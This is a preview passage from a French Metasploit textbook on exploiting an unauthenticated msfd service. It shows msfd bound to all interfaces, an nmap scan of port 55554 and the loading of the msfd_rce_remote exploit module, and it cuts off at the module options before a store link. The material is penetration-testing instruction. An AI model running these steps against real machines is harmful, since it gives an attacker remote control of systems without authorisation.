Exploitation de Metasploit par Metasploit

Chose promise, chose due ! Au chapitre Premiers pas avec Metasploit à la section Les interfaces, nous avons abordé Msfd et les problèmes de sécurité y étant liés.

Le lancement du service se fait de la manière suivante :

root@kali:~# msfd -a 0.0.0.0 
[*] Initializing msfd... 
[*] Running msfd... 

Sur la machine de l’attaquant, il est possible de vérifier la présence de ce port grâce à un scan de ports classique :

root@kali:~# nmap -p 55554 192.168.171.144 
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-28 19:29 CET 
Nmap scan report for 192.168.171.144 
Host is up (0.000050s latency). 
 
PORT      STATE SERVICE 
55554/tcp open  unknown  
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds 

Dès lors, il est possible d’utiliser l’un des exploits précisés précédemment afin de prendre le contrôle de la machine distante grâce à l’absence d’authentification :

msf5 > use exploit/multi/misc/msfd_rce_remote 
msf5 exploit(multi/misc/msfd_rce_remote) >show options 
 
Module options (exploit/multi/misc/msfd_rce_remote): 
 
  Name    Current Setting  Required  Description 
  ----    ---------------  --------  ----------- 
  RHOSTS          ...
Pour consulter la suite, découvrez le livre suivant :
couv_EPMETAS.png
60-signet.svg
En version papier
20-ecran_lettre.svg
En version numérique
41-logo_abonnement.svg
En illimité avec l'abonnement ENI
130-boutique.svg
Sur la boutique officielle ENI
Précédent
Préparation de la phase d’exploitation
Suivant
Exploitation de Metasploitable par Metasploit